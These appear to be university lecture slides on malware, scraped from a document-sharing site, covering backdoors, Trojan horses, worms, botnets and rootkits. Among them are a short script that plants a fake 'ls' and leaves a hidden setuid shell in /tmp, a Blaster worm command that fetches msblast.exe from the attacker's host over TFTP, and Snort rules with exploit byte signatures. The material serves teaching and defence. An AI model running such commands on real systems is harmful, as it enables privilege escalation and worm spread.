• No results found

Operating Systems Principles

N/A
N/A
Protected

Academic year: 2021

Share "Operating Systems Principles"

Copied!
28
0
0

Loading.... (view fulltext now)

Full text

(1)

Malware

CSC501

(2)

A Quick Recap

q

Previous Lecture

Q

Code Injection Attacks

q

Today:

Q

Malware

(3)

What is Malicious Software?

q

Malicious Software (a.k.a. Malware)

Q

Software designed to infiltrate or damage a

computer system, without the owner's

informed consent

-- http://en.wikipedia.org/wiki/Malware

Q

Examples:

Ø

Viruses, worms, Trojan horses, spyware, and

other malicious and unwanted software

Q

How about adware?

q

Malware references the intent of the

creator, rather than any particular features

(4)

Blaster

Nimda

CodeRed

Source: Symantec Internet Security Threat Report

q

Malware remains a top threat

Why should we care?

Conficker

Worm Infection Map (as of 4/1/09) from CWG

(5)

q

Recruiting Vulnerable Nodes è

Attack Network

Q

Zero-day

exploits w/o software patches

Q

New

attack strategies

Ø Exploiting vulnerable client-side software, such as IE Ø Propagating malware with RFID tags, cell phones…

Q

Fast massive

replications

q

Providing “Value-Added” Services

Q

DDoS, spamming, or other malicious purposes …

Q

Sell/rent attack networks for profit

(6)

Taxonomy of Malicious Software

backdoors Logic Bombs Trojan Horses Viruses Worms Zombies Malicious Programs Needs Host Program Replicate Rootkits Independent

(7)

Backdoor

q

Secret entry point into a system

Q

Specific user identifier or password that

circumvents normal security procedures.

q

Commonly used by developers

(8)

Logic Bomb

q

Embedded in legitimate programs

q

Activated when specified conditions

met

Q

E.g., presence/absence of some file;

Particular date/time or particular user

q

When triggered, typically damages

system

(9)

Trojan Horse

q Attacker:

cat >/homes/victim/ls <<eof

cp /bin/sh /tmp/.xxsh

chmod u+s,o+x /tmp/.xxsh

rm ./ls

ls $*

eof

q Victim

ls

q

Program with an expected

and hidden effect

Q Appears normal/expected Q hidden effect violates

security policy

q

User tricked into executing

Trojan horse

Q Expects (and sees)

expected behavior

Q Hidden effect performed

(10)

Virus

q

Self-replicating code

Q

Alters normal code with “infected” version

Q

Generally tries to remain undetected

q

Operates when infected code executed

If spread condition

then

For target files

if not infected then alter to include virus

Perform malicious action

(11)

Worm

q

Runs independently

Q

Does not require a host program

q

Propagates a fully working version of itself

to other machines

q

Carries a payload performing hidden tasks

Q

Backdoors, spam relays, DDoS agents; …

q

Phases

(12)

Worm Propagation

A Worm

A Victim

1:Target Probing 2: Vulnerability Exploitation 3: Replication

(13)

MSBlast Worm (Aug., 2003)

192.168.0.1

Blaster

Target/RPC

192.168.10.11

1. Exploits target on port 135/TCP 2. Binds svchost.exe to port

4444/TCP via injected code

3. Connects to target on port 4444/TCP

4. Creates a shell “cmd.exe” and binds it to port 4444/TCP

5. Creates “TFTP Server” on port 69/UDP 6. Sends “TFTP” command to shell

7. Runs TFTP command; “teleports” msblast.exe file

8. Sends “START msblast.exe” command 9. Runs worm on target!

10. Closes connection

>tftp –I 192.168.0.1 GET msblast.exe

11. Shell closes

alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)

alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)

(14)

Example II : Lion/Linux Worm

192.168.0.1

Lion

Target/BIND

192.168.10.11

1. Checks reach-ability by connecting 53/TCP 2. Exploit target on port 53/TCP

3. Runs a shell command 4. Runs worm on target!

3. Replicate worms on port 27374/TCP

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)

alert tcp $HOME_NET any -> $EXTERNAL_NET 27374

(msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)

alert tcp $HOME_NET any -> $EXTERNAL_NET 27374

(msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)

(15)
(16)

Zombie

q

Secretly takes over another

networked computer by exploiting

software flows

q

Builds the compromised computers

into a zombie network or botnet

q

Uses it to indirectly launch attacks

(17)

Detailed Steps (1)

Unsecured Computers Attacker

Attacker scans Internet for

unsecured systems that can be compromised

1

(18)

Detailed Steps (2)

Unsecured Computersbie Attacker

Internet

Attacker secretly

installs zombie agent programs, turning

unsecured computers into zombies

2

(19)

Detailed Steps (3)

Attacker

Internet

Zombie agents Zombie agents ``phone home’’ and connect to a master server

3

Zombies Master Server

(20)

Detailed Steps (4)

Attacker

Internet

Zombies Master Server

Attacker sends commands to Master Server to launch a DDoS attack against

a targeted system

(21)

Internet

Detailed Steps (5)

Attacker Zombies Master Server Master Server sends signal to zombies to launch attack on targeted system

5

Targeted System System

(22)

Internet

Detailed Steps (6)

Attacker Zombies Master Server Targeted system is overwhelmed by zombie requests, denying requests from normal users

6

Targeted System System User Request Denied

(23)

Rootkit

q

“A rootkit is a set of programs and

code that allows a permanent or

consistent, undetectable presence on

a computer”

q

Goals:

Q Hide malicious resources

(

e.g.,

processes, files, registry keys, open ports, etc.

)

(24)

_ _ ____ _ _ _ _ ___ ___ ___ | | (_)_ __ _ ___ __ | _ \ ___ ___ | |_| | _(_) |_ |_ _|_ _|_ _| | | | | '_ \| | | \ \/ / | |_) / _ \ / _ \| __| |/ / | __| | | | | | | | |___| | | | | |_| |> < | _ < (_) | (_) | |_| <| | |_ | | | | | | |_____|_|_| |_|\__,_/_/\_\ |_| \_\___/ \___/ \__|_|\_\_|\__| |___|___|___|

ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing

netstat Trojaned! Hide connections chfn Trojaned! User->r00t

chsh Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access passwd Trojaned! User->r00t

ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs

linsniffer Packet sniffer! fix File fixer!

z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor!

lled lastlog editor!

bindshell port/shell type daemon!

(25)

Rootkit

q

Simple rootkits:

Q

Modify user programs (ls, ps)

Q

Detectable by tools like Tripwire

q

Sophisticated rootkits:

Q

Modify the kernel itself

(26)

Rootkit Classification

Kernel

Trojan login Trojan ps Trojan ifconfig good tripwire Kernel-level RootKit

Kernel

good login good ps good ifconfig good tripwire Trojan Kernel Module

Application-level Rootkit (I) Application-level Rootkit (II)

Kernel

Evil Program good program good program good program good program

Shadow Walker, adore Hxdef, NTIllusion

(27)

Rootkit Classification

Under-Kernel RootKit

Kernel

good login good ps good ifconfig good tripwire Evil VMM

(28)

Next Lecture

References

Related documents

A diferencia de la mayoría de los ejecutivos (que establecen redes de contacto para tener acceso a recursos, para promocionarse a sí mismos o a sus compañías, o para impulsar

If it is believed, as Smith (2013) posits, that the librarian should work to help citizens be socially engaged and independent thinking adults, then critical literacy can be

The trend observed for pristine XD composites of an initial decrease followed by a linear increase in thermal conductivity as nanotube weight fraction increases is also

Question 2: Comparing the three care settings, were there differences in: Family health and functioning outcomes: physical health, mental health, functioning (family

The first representation is set forth to assist the agent in discharging the ethical obligation imposed by Standard of Practice 16-9 of the Code of Ethics of the National

This study is aimed at assessing whether a single day CRM oriented team training combining didactic and simulation sessions improves the clinical per- formance of

Yet the technology of the crowdsourced map, designed far away from the vil- lages, indigenous movements, urban activists, and other movements that originally gave rise to a

ﻪﺧﺎﺷ و دوﺮﻠﺑﺎﺑ ﺐﻴﺷ ﻪﺸﻘﻧ ﻪﺑ يﺎﻫ ددﺮﮔ ﻪﻌﺟاﺮﻣ نآ ﻲﻋﺮﻓ (. ﻪﻧﻮﻤﻧ يﺎﻬﻫﺎﮕﺘﺴﻳا يرادﺮﺑ ﻢﻳدﻮﻤﻧ بﺎﺨﺘﻧا ﻲﻤﻴﻠﻗا و ﻲﻳﺎﻴﻓاﺮﻐﺟ ﻂﻳاﺮﺷ يﺎﻀﺘﻘﻣ ﻪﺑ و ﻪﻧﺎﺧدور لﻮﻃ و ﺖﻌﺳو ﻪﺑ ﻪﺘﺴﺑ